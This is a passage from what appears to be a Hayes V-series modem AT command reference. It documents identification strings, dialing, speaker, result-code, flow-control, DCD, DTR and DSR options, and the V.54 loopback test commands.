at 9600 bps + Bit 2: Supports Bell 103 110/300 bps +D15 Bit 1: Supports S95 Bit 5 for COMPRESSION: result code + Bit 0: Supports S95 Bit 4 for AUTOSTREAM: result code +D16 Bit 3: Supports S95 Bit 3 PROTOCOL: result code + Bit 2: Supports S95 Bit 2 CARRIER result code + Bit 1: Supports S95 Bit 1 CONNECT/ARQ result code + Bit 0: Supports S95 Bit 0 CONNECT XXXX (for DCE rate) + + +I4 "b" String +The second string, the b-string, is composed of the ASCII character "b" +followed by nine bytes (D1-D9). The bit map for each byte is defined as +follows: + +b D1 D2 D3 D4 D5 D6 D7 D8 D9 + +D1 V.42 Alternate Protocol Supported + Bit 4: V.42 LAPM Protocol Supported + Bit 2: X.25 Protocol Supported + Bit 1: LAPB (Original V-series Point-to-Point error-control) Protocol + Supported + +D2 Bit 8: Reserved (should be set to zero) + Bit 4: MNP Class 5 Supported + Bit 2: V.42bis Supported + Bit 1: Compression Through the X.25 Network + Supported + +D3/D4 These combine to indicate the number of AutoStream Type A channels which + are supported. The formula (D3*16 + D4) is used. Zero means AutoStream + is not supported + + +I4 "r1" and "r3" strings +These ID strings allow software to determine the available speeds that may be +used to send AT commands. The r1-string contains a bit map that indicates at +which DTE rates the autobaud process is supported. + +The r3-string is issued if synchronous DTE speeds are supported. The map +indicates which DTE rates are supported in Synchronous modes. Each r-string +begins with the lower case letter "r" and may be followed by as many as 39 +additional characters, not counting 's that will be used to separate +them from other strings. Those 39 additional characters are limited to the +ASCII-HEX alphabet 0-9 and A-F. + +After the two lead-in characters (i.e., r), all subsequent characters +contain the DTE rate maps. All maps have the same mapping for convenience to +software. (Refer to the chart below.) Not all bit assignments are possible: +for example, the split speeds have no meaning in the r3 synchronous map and +are always filled with zeros. + +In r1, if the bit is filled with a 1, the corresponding DTE rate is supported +for sending AT commands to the device. A zero indicates that DTE rate is not +supported for AT commands. + +In the r3 map, the bits simply indicate which DTE rates are supported for +synchronous operation on-line. This does not indicate, however, the supported +rates for synchronous V.25bis commands. + +Split speeds if available are marked in the r1 string only when the +appropriate B command option has been selected. Future expansion of these +strings may include new speeds that are not in strict ascending order. + +DTE Rate Bit Map for r1 and r3 Strings + + Character Bit # DTE Rate +----------------------------------------------------------------------------- + 3:1 bit 0 45.45 bps + 3:2 bit 1 50 + 3:4 bit 2 75 + 3:8 bit 3 75/600 (xmt is 75, rcv is 600) + + 4:1 bit 4 75/1200 + 4:2 bit 5 110 + 4:4 bit 6 134.5 + 4:8 bit 7 50 + + 5:1 bit 8 300 + 5:2 bit 9 450 + 5:4 bit 10 600 + 5:8 bit 11 600/75 + + 6:1 bit 12 1200 + 6:2 bit 13 1200/75 + 6:4 bit 14 1800 + 6:8 bit 15 2000 + + 7:1 bit 16 2400 + 7:2 bit 17 3000 + 7:4 bit 18 3600 + 7:8 bit 19 4200 + + 8:1 bit 20 4800 + 8:2 bit 21 5400 + 8:4 bit 22 6000 + 8:8 bit 23 6600 + + 9:1 bit 24 7200 + 9:2 bit 25 7800 + 9:4 bit 26 8400 + 9:8 bit 27 9000 + + 10:1 bit 28 9600 + 10:2 bit 29 12000 + 10:4 bit 30 14400 + 10:8 bit 31 16800 + + 11:1 bit 32 19200 + 11:2 bit 33 21600 + 11:4 bit 34 24000 + 11:8 bit 35 26400 + + 12:1 bit 36 28800 + 12:2 bit 37 31200 + 12:4 bit 38 33600 + 12:8 bit 39 36000 + + 13:1 bit 40 38400 + 13:2 bit 41 43200 + 13:4 bit 42 48000 + 13:8 bit 43 52800 + + 14:1 bit 44 56000 + 14:2 bit 45 57600 + 14:4 bit 46 62400 + 14:8 bit 47 64000 + + 15:1 bit 48 67200 + 15:2 bit 49 72000 + 15:4 bit 50 76800 + 15:8 bit 51 81600 + + 16:1 bit 52 86400 + 16:2 bit 53 91200 + 16:4 bit 54 96000 + 16:8 bit 55 100800 + + 17:1 bit 56 105600 + 17:2 bit 57 110400 + 17:4 bit 58 115200 + 17:8 bit 59 reserved ("0") + +L - Speaker Volume Level Selection +The L command setting determines the volume level of the speaker, when +supported by the modem. Some modems use the speaker of the computer in which +they are installed. In this case, where supported, the L command adjusts the +speaker volume as indicated in the options below for the duration of the +communications session. + +L0 Low speaker volume + +L1 Low speaker volume + +L2 Medium speaker volume + +L3 High speaker volume + +M - Speaker On/Off Selection +The M command setting determines whether the speaker function of the modem is +on or off. Some modems use the speaker of the computer in which they are +installed. In this case, where supported, the M command turns the speaker on +an off as indicated in the options below for the duration of the +communications session. + +M0 Speaker always off. + +M1 Speaker on until carrier detected. + +M2 Speaker always on; stays on after carrier is detected. + +M3 Speaker off as digits are dialed, but on during ringback and on until + carrier signal is detected. + +N - Negotiation of Handshake Options +The N command selects whether or not the local modem performs a negotiated +handshake with a remote modem when the communications speeds of the two modems +are different. The options for this command are useful when a particular speed +and communication standard are required. Both symmetrical and asymmetrical +protocols can be selected. Note that the options supported by for this command +vary significantly between country-specific implementations. + +N0 When originating or answering, handshake only at +the communication standard specified by S37 and B command + +N1 When originating, begin handshake at the communication standard specified +by the B command and S37. During handshake fallback to a lower speed may occur +When answering, negotiate according to the following sequence of communication +standards: V.32, Ping Pong, V.22bis, V.22, and V.21 + +N2 When originating, begin handshake at the communication standard specified +by the B command and S37. During handshake fallback to a lower speed may occur +When answering, negotiate according to the following sequence of communication +standards: V.32, Ping Pong, V.22bis, V.22, V.23, and V.21 + +N3 When originating, handshake only at the communication standard specified +by S37 and B command. When answering, negotiate according to the following +sequence of communication standards: V.32, Ping Pong, V.22bis, V.22, and V.21 + +N4 When originating, handshake only at the communication standard specified +by S37 and B command. When answering, negotiate according to the following +sequence of communication standards: V.32, Ping Pong, V.22bis, V.22, V.23, and +V.21 + +N5 When originating, begin handshake at the communication standard specified +by B command and S37. During handshake fallback to a lower speed may occur +When answering, handshake only at the communication standard specified by S37 +and B. + +O - On-Line Command +If the modem is in the on-line command state, then the O0 command causes it to +go to the on-line state of the previously established connection. If the O1 +command is issued (modems supporting 2400 bps and higher), the modem goes to +on-line state and retrains its adaptive equalizer. + +If the modem is off hook in the idle state, then O0 and O1 (modems supporting +2400 bps and higher) cause it to go to the handshaking state. Originate or +answer mode is determined from the last D or A command or R dial modifier that +was selected. If the modem is on-hook, idle, or if the modem is in a test +condition, a command execution error results. Note that O1 serves a different +purpose in lower speed modems (e.g., Smartmodem 1200 and Smartmodem 300). + +P - Select Pulse Dialing Method +The P command instructs the modem to use pulse dialing. Dialed digits will be +pulse dialed until a T command or dial modifier is received. This command is +also discussed under Dial modifiers, in conjunction with the D command. + +Q - Result Code Display Options +The Q command controls whether the result codes generated by the modem are +displayed to the attached DTE. Some software does not function properly when +modem responses are returned. + +Q0 Result codes enabled + +Q1 Result codes disabled + +Q2 Disables the RING result code. In answer mode, also disables CONNECT and +NO CARRIER result codes + + +Sr - Addresses an S-Register +The Sr command points to a specific S-Register. Subsequent commands, such as ? +and =, may read or write to the selected register. Note that S0 is the +factory-set pointer for this command, and that the S-address is not stored in +a stored profile. Thus, the &F, Z0, and Z1 commands will select S0 and +possibly affect subsequent ? and = commands unless they are preceded by an Sr +command. Note that the value of S0 is of course storable; it is the pointer to +S0 that is not storable. + +Sr=n - Write To An S-Register +The Sr=n command is writes a value to a specified register. The value of n is +written to the S-Register specified by r, overriding the previous value. If no +n suffix is present, the address previously selected via Sr is used. If no n +suffix is present, the value 0 is written. + +Sr? - Read An S-Register +The contents of S-Register r are sent to the DTE as three decimal digits. This +informational text response is formatted with as determined by the V +command currently in effect. If no n (suffix) is present, the last register +selection is assumed. (Refer to the Sr command.) On power up, the factory-set +selection is 0. Note: ? is interpreted by the modem as Sr?. + + +T - Select Tone Dialing Method +The T command instructs the modem to send DTMF tones while dialing. Dialed +digits will be tone dialed until a P command or dial modifier is received. +This command is also discussed under Dial modifiers, in conjunction with the D +command. + + +V - Result Code Format Options +The V command determines whether result codes (including call progress and +negotiation progress messages) are displayed as numbers or words. + +V0 Result codes displayed in numeric form + +V1 Result codes displayed in verbose form + +W - Negotiation Progress Message Selection +The W command works in conjunction with S95 (where supported) to determine +which result codes will be used to describe the type of connection and +protocol, etc., that resulted from handshaking and negotiation. + +The W command supports extended result codes in addition to the CONNECT result +code. When the modem is operated in error-control mode (&Q5 is in effect), W +command and S95 together allow the user to select these additional result +codes: + + CARRIER + PROTOCOL + AUTOSTREAM + COMPRESSION + CONNECT + +Any result codes enabled by the W command and S95 will be generated in the +order indicated above. If AutoStream is not being used, no AutoStream result +code is returned. Result codes not enabled by the W command option in effect +may be turned-on by setting certain bits in S95. The W command options below +are available when S95 is configured for any setting other than the factory- +setting of 0. + +W0 CONNECT result code reports DTE speed, and if S95=0, then disable all + extended result codes + +W1 CONNECT result code reports DTE speed, and if S95=0, then enable the + CARRIER and PROTOCOL extended result codes + +W2 CONNECT result code reports DCE speed, and if S95=0, then disable all + extended result codes + +Refer to the S95 bit map description in the next section. Note that selecting +W0 and setting S95=12 is the same as selecting W1; and that selecting W0 and +setting S95=1 is the same as selecting W2. S95 cannot be configured to force +W2 to report DTE speed in the CONNECT result code; and that there is no +setting of S95 that will force W1 not to produce the CARRIER and PROTOCOL +result codes. S95 extends the functionality of the W command. The W command +with S95=0 (factory setting) maintains backwards compatibility with previous +V-Series System Products. However, selecting W0 and setting S95 as required +allows you to tailor result codes characteristics to your own requirements. + +X - Call Progress Options +The X command enables tone detection options used in the dialing process. As +these functions are enabled and disabled, the modem's result code reporting is +also affected. For this reason, this command is frequently used to control the +modem's range of responses; however, its primary function is that of +controlling the modem's call response capabilities. Result code definitions +are covered in the next section. + +X0 Busy and dial tone detection are disabled. Only result codes 0-4 are +enabled. Only the CONNECT result code is permitted, and no indication of the +telephone line speed. This setting overrides any other result code selections +made with the W command and S95 + +X1 Busy and dial tone detection are disabled. Result codes 0-5 are enabled +and linespeed reporting with CONNECT XXXX messages. W command options and S95 +are enabled + +X2 Busy detection is disabled. Dial tone detection is enabled. Result codes +0-6 are enabled and linespeed reporting with CONNECT XXXX messages. W command +options and S95 are enabled + +X3 Busy detection is enabled. Dial tone detection is disabled. Result codes +0-5 and 7 are enabled and linespeed reporting with CONNECT XXXX messages. W +command options and S95 are enabled + +X4 Busy and dial tone detection are enabled. Result codes 0-7 are enabled and +linespeed reporting with CONNECT XXXX messages. W command options and S95 +enabled + +The @ and W dial modifier result codes are not affected by the X command in +effect. The @ dial modifier enables result codes 8 (NO ANSWER) and 7 (BUSY) +each time it occurs in the dial string. The W dial modifier enables result +codes 6 (NO DIALTONE) and 7 (BUSY) each time it occurs in the dial string. + +Y - Long Space Disconnect Options +The Y command determines if the modem will disconnect a call upon receiving a +long space (1.6 sec break) signal from the distant end. If Y1 is selected, the +modem will send a 4-second break (space) before going on hook when an H0 +command is issued or, if &D2 is selected, when DTR goes off. Refer also to +register S82 for more information. + +Y0 Disable long space disconnect + +Y1 Enable long space disconnect + +Z - Soft Reset Command +The modem can be reset by issuing the Z. The command tells the modem to go on +hook and restore the selected stored profile. Any non-storable parameters +previously set by commands are returned to their factory settings. The modem +aborts execution of all commands following the Z command on the same command +line. Subsequent commands on the same line are ignored. Refer to the &W +command for description of which modem parameters are included in a stored +profile. Z0 recalls stored user profile 0, stored with &W0; Z1 recalls stored +user profile 1, stored with &W1. + +Z0 Recall stored profile 0 + +Z1 Recall stored profile 1 + +&B - V.32 Auto Retrain Options +The &B command is used to enable and disable auto retrain in V.32 mode. During +a V.32 or a V.22bis connection, the modem continually monitors line quality. +The &B command determines whether the modem ignores a line quality problem or +attempts to correct the situation by retraining. The selection made with this +command affects V.32 connections only. + +&B and &B0 Disable V.32 Auto Retrain + +&B1 Enable V.32 Auto Retrain + +&C - Data Carrier Detect Options +The &C command determines how the state of the DCD lead relates to the carrier +from the distant end. The command will take effect immediately when issued. +The behavior patterns for DCD depend on the specific &C and &Q commands in +effect. Also, DCD patterns depend on whether on-line operation is half or full +duplex. Finally, if &Q5 is in effect, DCD behavior depends on whether S10=255 +or S10<255. DCD circuit operation is according to the descriptions below. + +DCD Behaviors for Half-Duplex Operation + &C0 &C1 &C2 +---------------------------------------- +&Q1 E C C +&Q2 E C C +&Q3 E C C +&Q4 E C C +&Q5 A E A +&Q5 (S10=255) A C F + +DCD Behaviors for Full-Duplex Operation + &C0 &C1 &C2 +---------------------------------------- +&QO A B D +&Q1 B B B +&Q2 B B B +&Q3 B B B +&Q4 B B B +&Q5 A E A +&Q6 A B D +&Q5 (S10=255) A B D + +Table Legend: + +A - The DCD circuit is ON at all times + +B - DCD=0 in Idle, DCD tracks carrier in On-Line State with S9: + The DCD circuit is OFF while the connection attempt is being made. It goes + ON immediately after the CONNECT result code is issued, and goes OFF + immediately after loss of remote carrier. If the remote carrier is + restored and the S9 (carrier detect response time) delay is completed + before the S10 (lost carrier to hang-up) delay expires, then hang-up is + avoided and the DCD circuit goes ON again as the modem goes on-line. + Otherwise, DCD remains OFF during the hang-up process prior to the result + code message. If S10=255, hangup will not occur unless initiated by the + DTE. + +C - DCD=0 in Idle, DCD tracks carrier in On-Line State without S9: + The DCD circuit is OFF when the modem is idle. It goes ON immediately + after the CONNECT result code is issued, and goes OFF immediately after + loss of remote carrier. If the remote carrier is restored, then DCD will + go ON regardless of the S9 value in effect. + +D - DCD=1 in Idle, DCD tracks in On-Line with S9: + The DCD circuit is normally ON when the modem is idle, and it is ON while + the remote carrier is present and the modem is on-line. The signal goes + OFF immediately after loss of remote carrier. If the remote carrier is + restored, then DCD will go ON again regardless of S9. If the Hangup + Process is initiated by the DTE using DTR or issuing ATH from the + on-line state, then DCD will return ON just prior to the modem issuing the + OK result code. If S10<255 (lost carrier to hang-up delay) and a timeout + equal to S10 expires before the remote carrier is restored, then the + hang-up process begins during which DCD=0. DCD will return ON again just + prior to the issue of the NO CARRIER result code. If the remote carrier is + restored and the S9 delay is completed before the S10 delay expires; then + the modem does not hangup, and DCD will go ON again when the modem returns + on on-line. + +E - DCD=0 in Idle, DCD=1 in On-Line State (no tracking): + The DCD circuit is OFF when the modem is idle in the command state. DCD + goes ON immediately after the CONNECT result code is issued, and it goes + OFF when the modem begins the hangup process. DCD does not track the + presence of remote carrier energy. + +F - DCD=1 in Idle, DCD tracks in On-Line without S9: + This behavior pattern is associated only with (&C2, &Q5, S10=255, half + duplex), and it only occurs at 4800 and 9600 bps in Hayes proprietary V.32 + half-duplex operation (Ping Pong). The DCD circuit is normally ON when the + modem is operating in half duplex and idle in the command state, and it is + ON while the remote carrier is present in the on-line state. It goes OFF + approximately 3 seconds after loss of remote carrier. If the remote + carrier is restored, then DCD will go ON again (regardless of S9). If the + hangup process is initiated by the DTE using DTR or escaping to command + state and issuing ATH when on-line, DCD will return ON just prior to + the modem issuing the OK result code. The modem will not begin the hangup + process if S10=255. + +&D - Data Terminal Ready Options +The &D command affects how the modem will respond to the state of the DTR +signal and changes to this circuit. The effects of DTR states and changes are +also very dependent upon the &Q command that is in effect. The test modes +associated with certain &T commands are only affected by DTR changes when &D3 +is in effect and are not affected by &Q command options. Below, DTR-related +behaviors are defined in relation to the &D and &Q commands in effect in smart +mode. In dumb mode, the behavior is as defined below for &D2 regardless of the +actual &D command in effect. + +DTR Behaviors in Smart Mode + &D0 &D1 &D2 &D3 +----------------------------------------------- +&Q0 none E I, H R +&Q1 H E I, C, H R +&Q2 I, D, H I, D, H I, D, H I, D, R +&Q3 I, O, H I, O, H I, O, H I, O, R +&Q4 H E I, C, H R +&Q5 none E I, S R +&Q6 none E I, S R + + +Legend for Table Above - +Auto-Answer Function +I The DCD circuit is ON at all times. + +DTR OFF-to-ON Effects: +----------------------------------------------------------------------------- +D If S1=0 and in the idle condition, DTR OFF-to-ON signals the modem to go + off hook and start the dialing process using the dial string stored by the + last &Z0= command. S25 does not affect the modem's reactions to DTR going + OFF-to-ON. + +O If S1=0 and in the idle condition, DTR OFF-to-ON signals the modem to go + off hook and start the originate handshake process. S25 does not affect the + modem's reactions to DTR going OFF-to-ON. + +C Following a CONNECT result code, DTR must go ON before the time specified + by S25 (in seconds), or CTS will not go ON and the modem will go to the + Hangup Process, issue the NO CARRIER result code, at the Response Speed, + and go to the idle condition. + +DTR ONÐtoÐOFF Effects +----------------------------------------------------------------------------- +E If in the on-line state, DTR ON-to-OFF signals the modem to exit the + on-line state, issue an OK result code at the response speed, and go to + command state, while maintaining the connection. DTR transitions to OFF + that do not persist more than the time specified by S25 will not cause the + modem to exit the on-line state. + +H If in the on-line state, or in the handshaking, dialing, or answer process, + DTR ON-to-OFF signals the modem to execute the hangup process, issue an OK + result code at the response speed, and go to the idle condition. The modem + is not reset by DTR. This will also abort any dial, handshake, or answer in + process. DTR transitions to OFF that do not persist more than the time + specified by S25 will not trigger a transition to the hangup process. + +R DTR ON-to-OFF signals the modem to immediately perform a hard reset + regardless of state. All processes are aborted. S25 does not affect the + modem's reactions to DTR going OFF-to-ON. There is no result code. + +S If in On-Line, or in the Handshaking, dialing processes, or answer process, + a transition of DTR ON-to-OFF signals the modem to shut down the + communications link. When the modem has completed transmitting the data + placed into its buffer by the DTE and has completed sending the received + data to the DTE, the modem will execute the hangup process, issue an OK + result code at the response speed, and remain idle in the command state. + The modem is not reset by DTR. This will also abort any dial, handshake, or + answer in process. DTR transitions to OFF that do not persist more than the + time specified by S25 will not trigger a transition to the hangup process. + +&F - Recall Factory Profile +The &F command recalls the configuration stored programmed in ROM at the +factory. This operation completely replaces the command options and S-Register +values in the active configuration with those comprising the factory +configuration. For the commands and registers stored and their factory-set +values, see the AT Command Set Reference Card accompanying your modem. + +&G - Guard Tone Selection +The &G command tells the modem which guard tone, if any, to transmit while +transmitting in the high band (answer mode). Guard tone is transmitted only +while the modem is in the transmitting in the answer mode and during the +answer handshake. + +&G0 Guard tones disabled + +&G2 1800 Hz guard tone enabled (V.22,V.22bis only) + + +&J - Jack Type Selection (Auxiliary Relay Options) +The &J command designates the type of jack with which the modem is connected +to the telephone line. This selection is made by changing the way the +auxiliary relay is controlled. The auxiliary relay connects the A lead to the +A1 lead, but is normally open. + +&J0 The auxiliary relay is never closed.(suitable for RJ-11, RJ-41S, or + RJ-45S type phone jack) + +&J1 The auxiliary relay is closed while modem is off hook.(suitable for RJ-12 + or RJ-13 type phone jack) + + +&K - Local Flow Control Options +The &Kn command is used to select the local flow control method for use when +the modem is operating in error-control mode or asynchronous mode with +Automatic Speed Buffering (ASB). ASB is used for communication environments +requiring a "Fixed Speed Interface" between the modem and the DTE. + +S39 stores the current flow control setting. Flow control is always inhibited +in command state and is valid only when on-line in error-control mode. Bi- +directional flow control regulates the data stream between the DTE and the +modem. Specific functions depending on parameter value is as follows: + +&K0 All flow control is disabled. May be selected for use during + error-control mode at the risk of overflowing the buffers and + losing data + +&K1 RTS/CTS flow control is enabled. Note that the DTE-V-series cable must + have the supporting wires. The &T19 command may be used by software to + determine if the cable is properly wired + +&K2 XON/XOFF flow control is enabled. These characters are not programmable + and are fixed at DC1 and DC3, respectively. This method should not be + used when XON/XOFF characters will be sent as user data or as part of a + file transfer protocol + +&K3 RTS/CTS flow control is enabled. Note that the DTE-V-series cable must + have the supporting wires. The &T19 command may be used by software to + determine if the cable is properly wired + +&K4 XON/XOFF flow control is enabled. These characters are not programmable + and are fixed at DC1 and DC3, respectively. This method should not be + used when XON/XOFF characters will be sent as user data or as part of a + file transfer protocol + +&K5 Transparent XON/XOFF The data stream is controlled by characters DC1 and + DC3, The chars DLE, DC1, and DC3 are transparentized by sending DLE + followed by the character XORed with 21hex + + +&L - Line Type Selection (Dialup/Leased) +The &L1 command instructs the modem to alter its function for leased line +environments. The modem will act as if S10=255 and M0 are in effect. It will +not dial numbers or send answer tone. The modem must receive an X1D or A +command to go on-line. The modem will then go to the dialing or answering +process, respectively. Once the handshaking process is completed, the modem +tries to stay in the on-line state. When it loses carrier, it returns to the +dialing or answering process. Carrier level is determined in one of several +techniques, depending on the particular modem. See the Installation Guide for +information on setting carrier level. + +&L0 Select Dial up line operation +&L1 Select Leased line operation + +&O - PAD Channel Selection +The &O command instructs the modem to move from AT command state to a PAD +waiting state where it is ready to receive X.25 commands. A Reset operation +(see Chapter Two: V-series X.25 Communications) is performed on the selected +channel. This command can be issued while off-line so that the PADs may be +configured prior to making a connection. + +&O0 Move to the PAD command state of the last channel accessed + (or to channel 1 if no previous channel has been selected) +&O1 Move to the PAD command state for channel 1 +&O2 Move to the PAD command state for channel 2 +&O3 Move to the PAD command state for channel 3 +&Q4 Move to the PAD command state for channel 4 + +&Q - Communications Mode Options +The &Q command selects the communication mode. The &Q command determines how +the modem will treat transmitted and received data while in the on-line state +(i.e., asynchronous, synchronous, AutoSync, or error-control) and establishes +certain call setup procedures. Refer also to the &C, &D, and &S commands in +this section. + +Command On-Line State Special Features +----------------------------------------------------------------------------- +&Q0 Asynchronous DCD and DSR behaviors are unique. Refer to &C + and &S commands + +&Q1 Synchronous DTR must be ON after CONNECT when timer value + in S25 expires + +&Q2 Synchronous DTR OFF-to-ON executes dialing process; the D + command invalid DTR ON-to-OFF executes the + hangup process; the A command is invalid + +&Q3 Synchronous Dialing and Voice allowed from phone set when + DTR is OFF. DTR OFF-to-ON executes the + handshaking process (in originate mode); the D + command is invalid. DTR ON-to-OFF executes + hangup process; the A command invalid + +&Q4 Hayes AutoSync DTR must be ON after CONNECT when timer equal + to S25 expires. DTE data speed is 9600 bps + which is not equal to response speed or line + speed, yet all result codes are at the + response speed + +&Q5 Error-Control This enables error-control and is unique to + V-series system products. Depending upon which + V-series system product is being used, any one + of several point to point protocols can be + negotiated: LAPB, LAPM, X.25 or MNP. After the + modem handshake is complete, feature + negotiation (see S48) is used to determine + which protocol (see S46) will be used for the + communication session. If no common protocol + is found between the local and remote modems, + the fall back options (see S36) will be used + +&Q6 Buffered Asynchronous Automatic Speed Buffering is useful for DTEs + that cannot adjust to changing transmission + speeds. This mode ensures the DTE-modem speed + is set at a constant rate regardless of the + line speed determined during the modem + handshake. With the exception of flow control + (&Kn) between the DTE and the attached modem, + this mode is identical to the standard + asynchronous mode (&Q0). ASB operation is also + a fall back option (see S36) when the modem is + set for error-control mode (&Q5. Because the + DTE and DCE speeds are different in ASB, a 256 + byte buffer is provided so that flow control + does not occur on every character + transmission. Some DTEs are sensitive to the + buffer size so S-registers are provided to + control the lower (S49) and upper (S50) + boundaries + +&R - RTS/CTS Options +The functions of CTS and RTS in synchronous modes (&Q1, &Q2, and &Q3) is +determined by the &R command. The &R command has no effect if &Q0, &Q4, &Q5, +or &Q6 is in effect. See also the discussion of the CTS and RTS signals in +Chapter Three. Refer to the &K command for other RTS and CTS functions. Note +when &Q4 is in effect (AutoSync operation), RTS and CTS behaviors are not +unlike those specified by EIA 232-D/CCITT V.24. + +In Synchronous Modes (&Q1, &Q2, and &Q3): +----------------------------------------------------------------------------- +&R0 CTS tracks RTS while the modem is in On-Line State and observes the + RTS-to-CTS delay determined by S26 + +&R1 CTS is ON while the modem is in the On-Line State, and RTS is ignored. + +In Other Modes (&Q0, &Q4, &Q5, and &Q6), the &R option in effect does not +control the RTS and CTS functions. + +&S - Data Set Ready Options +The &S command controls the functions of the DSR circuit. The DSR circuit (pin +6 of the EIA 232-D interface) indicates when the modem is connected a +communication channel and is ready. + +In synchronous mode, when originating a call, DSR goes high when dialing is +completed and an answer tone is detected from the remote modem. When answering +a synchronous call, DSR goes high when the modem begins transmitting the +answer tone. + +In asynchronous or error-control mode, the &S command can be used to configure +the modem to keep the DSR signal high at all times or to have it operate +according to the EIA 232-D specification (as described in Chapter Three). + +When &Q0, &Q5, and &Q6 are in effect: +----------------------------------------------------------------------------- +&S0 DSR circuit is always on + +&S1 DSR=0 in the Idle State and when in a test mode. DSR circuit is turned ON + at start of the Handshaking Process. DSR is turned OFF when Hangup + Process is started + +&S2 DSR=0 in the Idle State and when in a test mode. DSR circuit is turned ON + at end of handshake prior to issuing of the CONNECT result code. DSR is + turned OFF when hangup process is started + +When &Q1 to &Q4 are in effect: +----------------------------------------------------------------------------- +&S0-1 DSR=0 in the command state and at idle. DSR circuit is turned ON at + start of the handshaking process. DSR is turned OFF when hangup process + is started + +&S2 &S2- DSR=0 in the command state and at idle. DSR circuit is turned ON + at end of handshake prior to issuing of the CONNECT result code. DSR is + turned OFF when Hangup Process is started + + +&T - Test Options +The following &T command options are used to configure and place the modem in +various test modes as defined by CCITT V.54. These tests can be used to verify +the analog and digital portions of the modem's operation, as well as those of +the remote modem. Some of these tests require a connection be established +before running the procedure. The &T19 command (not a CCITT V.54 test) can be +used to test the RTS/CTS functions of the cable used to attach the modem to +the DTE. + +&T0 - Terminate Test In Process +If a V.54 Loopback Test is in process as a result of executing an &Tn command, +then the &T0 command will cause that test to be terminated provided that the +modem is in the command state, or a V.54 state that accepts commands from the +DTE. See specific &T command descriptions for termination actions. + +&T1 - Initiate Local Analog Loopback +The modem goes on hook and configures itself for analog loopback (using low +frequency band if no suffix or "O" suffix, and high frequency band if "A" +suffix). DSR is turned off (if &S1 is in effect), the analog loopback state is +entered, and the test timer is set to the value in S18. A CONNECT result code +is sent to the DTE, and the test timer then begins its count down. The test +terminates when the test timer expires. If S18 equals 0, then the test must be +terminated by an &T0, H0, or Z command. While any command may be entered while +the modem is in this test state, the modem response is not specified except +for H0, &T0, and Z - any of which will terminate the test. Upon termination of +the test, the modem enters the command state. + +Result Codes: Description +----------------------------------------------------------------------------- +CONNECT when local analog loopback state is entered +ERROR if any other &Tn test is active (except &T0) or if + in the On- Line Command State +OK after test is stopped by test timer, the H0 command, + or the &T0 command + +&T3 - Perform Local Digital Loopback +The modem must be in the command state with a connection established when this +command is issued. Otherwise an ERROR result code occurs. This command +establishes a loopback of received data, after demodulation, and sends it back +to the distant end. The modem is configured for local digital loopback, DSR is +turned off (if &S1 is in effect), the test timer is started with the value in +S18, and an OK result code is sent to the DTE . If S18 contains a 0, the test +must be terminated by a &T0, H0, or Z command. The latter two result in the +modem going on hook. If S18 does not contain 0, the test is terminated after +the number of seconds stored in S18. + +Result Codes: Description +----------------------------------------------------------------------------- +OK after 2 s delay +ERROR if any other self test is active (&T1,&T6-&T8) + or if in Idle State +OK when test is terminated + +&T4 - Grant RDL Requests +When in the On-Line State the modem will honor a remote digital loopback +request from a distant modem if it occurs. This will result in an ERROR if the +command is given while any V.54 test is active (&T1, &T3, &T6, &T7, or &T8). + +&T5 - Deny RDL Requests +The modem will not respond to a remote digital loopback request from a distant +modem. This will result in an ERROR if the command is given while any V.54 +test is active (&T1, &T3, &T6, &T7, or &T8). + +&T6 - Initiate Remote Digital Loopback +The command is valid only if the modem is in the command state with a +connection at 1200 or 2400 bps. The modem sends the remote digital loopback +request signal to the distant modem (see CCITT V.22 and V.54). After the RDL +acknowledgment signal is received from the distant modem, DSR is turned off +(if &S1 is in effect), the on-line state is entered, a CONNECT result code is +sent to the DTE, and the test timer is set to the value in S18. If the modem +does not receive the RDL acknowledgment signal from the distant end in three +seconds, it sends an ERROR result code to the DTE and returns to the command +state. The modem sends the signal specified in CCITT V.22 to release the +remote digital loopback when the test is terminated. The test may be +terminated by the H0, Z, or &T0 command. The test will also terminate when the +test timer expires (sending the modem to the command state) or carrier is lost +(causing a NO CARRIER result code and the modem to go on hook in the command +state). + +Result Codes: Description +----------------------------------------------------------------------------- +CONNECT when On-Line State is entered +ERROR if any V.54 test is active (&T1, &T3, &T6-&T8) +ERROR if not in On-Line Command State +ERROR if command is issued at other than 1200 or 2400 bps +ERROR if the RDL signal is not acknowledged + +&T7 - Initiate RDL With Self Test +The command is only valid if the modem is in the command state with a +connection at 1200 or 2400 bps. The modem sends the remote digital loopback +request signal to the distant end (see CCITT V.22). After the RDL +acknowledgment signal is received from the distant end, DSR is turned off (if +&S1 is in effect), the on-line state is entered, an OK result code is sent to +the DTE, and the test timer is set to the value in S18. While the test is +active the modem sends a test message to the distant end and counts the errors +in the received (looped back) signal. The modem stays in the command state +during the test. When the test is terminated (except by a loss of carrier), +the modem sends the release signal to the distant end, as in &T6, and reports +the three-digit error count to the DTE. The information text is followed by an +OK result code. See the V command for formats. The test is terminated by loss +of carrier, or an H0, &T0, or Z command, and by the S18 timer running out. + +Result Codes: Description +----------------------------------------------------------------------------- +OK when command executed is started +OK after error count is sent to DTE +ERROR if any other self test is active (&T1,&T3,&T6-&T8) +ERROR if not in On-Line Command State +ERROR if command is issued at other than 1200 or 2400 bps +ERROR if the RDL acknowledgment signal is not received + +&T8 - Local Loopback With Self Test +The modem goes on hook and is configured for analog loopback (low frequency +band if none or O suffix, high frequency band if A suffix). The test timer is +started at the time indicated by S18, DSR is turned off (if &S1 is in effect), +A selftest condition is entered, and an OK result code is sent to the DTE. +During the test the modem sends a test message and counts errors in the looped +back signal. The test is terminated when the timer times out (S18) or the &T0, +H0, or Z command is issued. When the test is terminated, the three-digit error +count is sent to the DTE. An OK result code follows the error count. + +Result Codes: Description +----------------------------------------------------------------------------- +OK if AL Selftest state is entered +OK after error count is sent to DTE +ERROR if any other V.54 test is active (&T1,&T3,&T6,&T7), + or if on-line + + +&T19 - Perform RTS/CTS Cable Test +This test is used to determine whether the DTE-to-DCE cable supports the RTS +and CTS signals necessary for hardware flow control. This procedure should be +used by software before RTS/CTS flow control (&K3) is used. The modem takes +the following action when the &T19 command is issued: + +1. Turns OFF CTS (normally ON) and starts a 500 ms timer. + +2. Monitors RTS for ON and OFF states. + +3. After the 500 ms timeout or when both level-high and level-low states of + RTS are detected, the modem restores CTS to the ON condition and ends + the test. + +4. If both the on and off conditions of RTS are NOT detected, the modem + returns the ERROR result code; otherwise, it issues the OK result code. + +&U - Trellis Coding Options +The &U command is used to enable and disable Trellis coding for V.32 +connections. This selection affects V.32 9600 bps transmissions only. + +&U0 Enable Trellis coding +&U1 Disable Trellis coding + +&V - View Configuration Profiles +The &V command is used to display the active 